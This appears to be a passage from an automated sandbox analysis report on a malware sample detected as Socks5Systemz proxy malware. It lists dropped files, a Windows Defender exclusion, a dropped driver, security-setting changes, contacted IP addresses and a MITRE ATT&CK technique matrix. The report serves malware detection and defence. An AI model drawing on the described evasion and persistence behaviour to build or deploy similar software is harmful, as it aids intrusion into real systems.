            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,13_2_00458670
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_0040F910 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040F910
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00455644 GetUserNameA,13_2_00455644
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00405CF4 GetVersionExA,12_2_00405CF4
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Changes security center settings (notifications, updates, antivirus, firewall)
            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
            Source: svchost.exe, 00000008.00000002.2472107125.0000021E0A702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
            Source: svchost.exe, 00000008.00000002.2472107125.0000021E0A702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Socks5Systemz
            Source: Yara matchFile source: 0000000E.00000002.2472564067.0000000002C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2472654579.0000000002D31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: photorecoverylib59.exe PID: 7424, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Socks5Systemz
            Source: Yara matchFile source: 0000000E.00000002.2472564067.0000000002C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2472654579.0000000002D31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: photorecoverylib59.exe PID: 7424, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,14_2_609660FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,14_2_6090C1D6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,14_2_60963143
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,14_2_6096A2BD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,14_2_6096923E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,14_2_6096A38C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,14_2_6096748C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,14_2_609254B1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,14_2_6094B407
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6090F435 sqlite3_bind_parameter_index,14_2_6090F435
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,14_2_609255D4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609255FF sqlite3_bind_text,14_2_609255FF
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,14_2_6096A5EE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,14_2_6094B54C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,14_2_60925686
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,14_2_6094A6C5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,14_2_609256E5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,14_2_6094B6ED
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6092562A sqlite3_bind_blob,14_2_6092562A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,14_2_60925655
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,14_2_6094C64A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,14_2_609687A7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,14_2_6095F7F7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,14_2_6092570B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,14_2_6095F772
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,14_2_60925778
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6090577D sqlite3_bind_parameter_name,14_2_6090577D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,14_2_6094B764
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6090576B sqlite3_bind_parameter_count,14_2_6090576B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,14_2_6094A894
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,14_2_6095F883
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,14_2_6094C8C2
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,14_2_6096281E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,14_2_6096583A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,14_2_6095F9AD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,14_2_6094A92B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6090EAE5 sqlite3_transfer_bindings,14_2_6090EAE5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,14_2_6095FB98
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,14_2_6095ECA6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,14_2_6095FCCE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,14_2_6095FDAE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,14_2_60966DF1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,14_2_60969D75
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,14_2_6095FFB2

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		2
            LSASS Driver            		1
            Exploitation for Privilege Escalation            		21
            Disable or Modify Tools            		OS Credential Dumping11
            System Time Discovery            		Remote Services11
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Native API            		1
            DLL Side-Loading            		2
            LSASS Driver            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop ProtocolData from Removable Media21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		24
            Windows Service            		1
            DLL Side-Loading            		4
            Obfuscated Files or Information            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution            		1
            Bootkit            		1
            Access Token Manipulation            		21
            Software Packing            		NTDS47
            System Information Discovery            		Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script24
            Windows Service            		1
            DLL Side-Loading            		LSA Secrets281
            Security Software Discovery            		SSHKeylogging22
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		1
            File Deletion            		Cached Domain Credentials61
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job61
            Virtualization/Sandbox Evasion            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadow3
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection            		Network Sniffing1
            System Network Configuration Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Bootkit            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1632175 Sample: dxRwXy19pq.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 92 Antivirus detection for URL or domain 2->92 94 Antivirus detection for dropped file 2->94 96 Antivirus / Scanner detection for submitted sample 2->96 98 11 other signatures 2->98 9 dxRwXy19pq.exe 17 2->9         started        14 svchost.exe 2->14         started        16 svchost.exe 2->16         started        18 3 other processes 2->18 process3 dnsIp4 82 91.240.118.49, 443, 49687 GLOBALLAYERNL unknown 9->82 84 104.168.28.10, 49684, 49691, 49694 AS-COLOCROSSINGUS United States 9->84 60 ded120f6-6c1d-18da-bc8d-0195720b2895.exe, PE32+ 9->60 dropped 62 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, PE32 9->62 dropped 64 C:\Users\user\AppData\Local\...\001[1].exe, PE32+ 9->64 dropped 66 C:\Users\user\AppData\Local\...\silk[1].exe, PE32 9->66 dropped 110 Detected unpacking (changes PE section rights) 9->110 112 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->112 20 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe 2 9->20         started        23 ded120f6-6c1d-18da-bc8d-0195720b2895.exe 1 9->23         started        114 Changes security center settings (notifications, updates, antivirus, firewall) 14->114 26 MpCmdRun.exe 14->26         started        file5 signatures6 process7 file8 52 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, PE32 20->52 dropped 28 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp 18 26 20->28         started        54 C:\Users\user\AppData\...\d.ghSlh.exe (copy), PE32+ 23->54 dropped 100 Antivirus detection for dropped file 23->100 102 Multi AV Scanner detection for dropped file 23->102 104 Writes to foreign memory regions 23->104 106 3 other signatures 23->106 31 vbc.exe 7 6 23->31         started        35 conhost.exe 26->35         started        signatures9 process10 dnsIp11 68 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 28->68 dropped 70 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 28->70 dropped 72 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 28->72 dropped 76 21 other malicious files 28->76 dropped 37 photorecoverylib59.exe 1 19 28->37         started        86 127.0.0.1 unknown unknown 31->86 74 C:\Windows\Temp\VzUtW_3288.sys, PE32+ 31->74 dropped 88 Adds a directory exclusion to Windows Defender 31->88 90 Sample is not signed and drops a device driver 31->90 41 powershell.exe 31->41         started        44 powershell.exe 23 31->44         started        file12 signatures13 process14 dnsIp15 78 176.113.115.96, 443, 49718, 49720 SELECTELRU Russian Federation 37->78 80 45.93.20.230, 2024, 49719, 49722 COGENT-174US Netherlands 37->80 56 C:\ProgramData\PhotoRecoveryLib\sqlite3.dll, PE32 37->56 dropped 58 C:\ProgramData\...\PhotoRecoveryLib.exe, PE32 37->58 dropped 108 Loading BitLocker PowerShell Module 41->108 46 conhost.exe 41->46         started        48 WmiPrvSE.exe 41->48         started        50 conhost.exe 44->50         started        file16 signatures17 process18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.